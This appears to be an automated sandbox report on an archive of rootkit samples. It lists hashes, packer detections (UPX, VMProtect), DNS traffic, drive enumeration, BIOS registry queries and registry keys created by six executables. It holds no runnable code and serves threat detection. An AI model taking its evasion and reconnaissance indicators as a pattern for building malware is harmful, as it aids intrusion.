94e3a8f25dbff86ee6fe11ee045b70055357c08ae1723598a361c96eac5e2c24

Resubmissions

06-11-2023 21:21

231106-z7fk1afc7y 10

06-11-2023 21:09

231106-zzlgaafb6s 10

Analysis

max time kernel
164s
max time network
208s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
06-11-2023 21:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Rootkits & Bootkits.zip
Size

99.1MB
MD5

daa4a303815b2f4b3383ae4e9cb9d70b
SHA1

71ad3c455f33dff881e05816d87f43e48b6a5084
SHA256

94e3a8f25dbff86ee6fe11ee045b70055357c08ae1723598a361c96eac5e2c24
SHA512

7c2fd76a9fc12382df8abb3ad459dc962ffe07ff03fd4801eb6a68e0802df9b5a1136fec3d421ffcfb387033ea9de3d302a878f1a901257be03f6271574557fa
SSDEEP

1572864:Hz9VYu6kNhSQlSkdCUZdoinM59VVzg4dPC7v9A17V3nBDlxn3hqzLpPr:TQk/HHnMHkHBA17lnTqpPr

Score

7^/10

upx vmprotect

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\4Xkvo0.sys	upx
C:\Users\Admin\AppData\Local\Temp\4Xkvo0.sys	upx

Unexpected DNS network traffic destination 27 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114
Destination IP	114.114.114.114

VMProtect packed file 62 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/1676-1-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/3904-6-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/2200-4-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/1104-3-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/3208-2-0x0000000000400000-0x0000000001585000-memory.dmp	vmprotect
behavioral1/memory/2336-11-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/1104-13-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/1104-14-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/2200-15-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/3904-16-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/3904-17-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/2336-18-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/3208-24-0x0000000000400000-0x0000000001585000-memory.dmp	vmprotect
behavioral1/memory/2336-26-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/3208-61-0x0000000000400000-0x0000000001585000-memory.dmp	vmprotect
behavioral1/memory/3904-62-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/1676-63-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/1104-64-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/1676-65-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/2200-66-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/2336-67-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/1676-69-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/2336-70-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/2200-72-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/1104-73-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	vmprotect
behavioral1/memory/1676-1-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/3904-6-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/2200-4-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/1104-3-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/3208-2-0x0000000000400000-0x0000000001585000-memory.dmp	vmprotect
behavioral1/memory/2336-11-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/1104-13-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/1104-14-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/2200-15-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/3904-16-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/3904-17-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/2336-18-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/3208-24-0x0000000000400000-0x0000000001585000-memory.dmp	vmprotect
behavioral1/memory/2336-26-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/3208-61-0x0000000000400000-0x0000000001585000-memory.dmp	vmprotect
behavioral1/memory/3904-62-0x0000000000400000-0x000000000151E000-memory.dmp	vmprotect
behavioral1/memory/1676-63-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/1104-64-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
behavioral1/memory/1676-65-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/2200-66-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/2336-67-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/1676-69-0x0000000000400000-0x0000000001580000-memory.dmp	vmprotect
behavioral1/memory/2336-70-0x0000000000400000-0x0000000001519000-memory.dmp	vmprotect
behavioral1/memory/2200-72-0x0000000000400000-0x000000000157F000-memory.dmp	vmprotect
behavioral1/memory/1104-73-0x0000000000400000-0x000000000151B000-memory.dmp	vmprotect
C:\Users\Admin\Desktop\Rootkits\bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe	vmprotect
C:\Users\Admin\Desktop\Rootkits\cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe	vmprotect

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe

description	ioc	process
File opened (read-only)	\??\H:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\W:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\J:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\J:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\U:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\K:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\O:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\W:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\B:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\G:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\O:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\U:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\S:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\U:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\G:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\I:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\Y:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\J:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\V:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\J:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\J:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\A:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\O:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\U:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\R:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\K:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\X:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\E:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\H:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\Q:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\W:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\K:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\X:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\O:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\N:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\B:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\X:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\Y:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\I:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\A:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\A:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\A:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\R:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\U:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\X:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\L:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\I:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\R:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\X:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\T:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\V:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\O:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\I:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\Z:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\T:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\H:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\U:	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
File opened (read-only)	\??\X:	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
File opened (read-only)	\??\B:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\Z:	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
File opened (read-only)	\??\G:	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
File opened (read-only)	\??\M:	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
File opened (read-only)	\??\B:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
File opened (read-only)	\??\E:	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe

Enumerates system info in registry 2 TTPs 24 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client"	svchost.exe

Modifies registry class 24 IoCs

Processes:

0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exebf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.execf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.execc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	cf16d17a2f592979b874fc68bf568466ee5bd6d7839ec3f49820cf09e946d196.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	cc5abd771e2f2939295359eae96e62b3a7da41689222b0349b8caf91bd5e385b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	bf909c34e676e9da0004e6fe8ed640380cc9b658d4d4e5e30f29fa16fadf8102.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Key created	\REGISTRY\USER\S-1-5-21-1114462139-3090196418-29517368-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
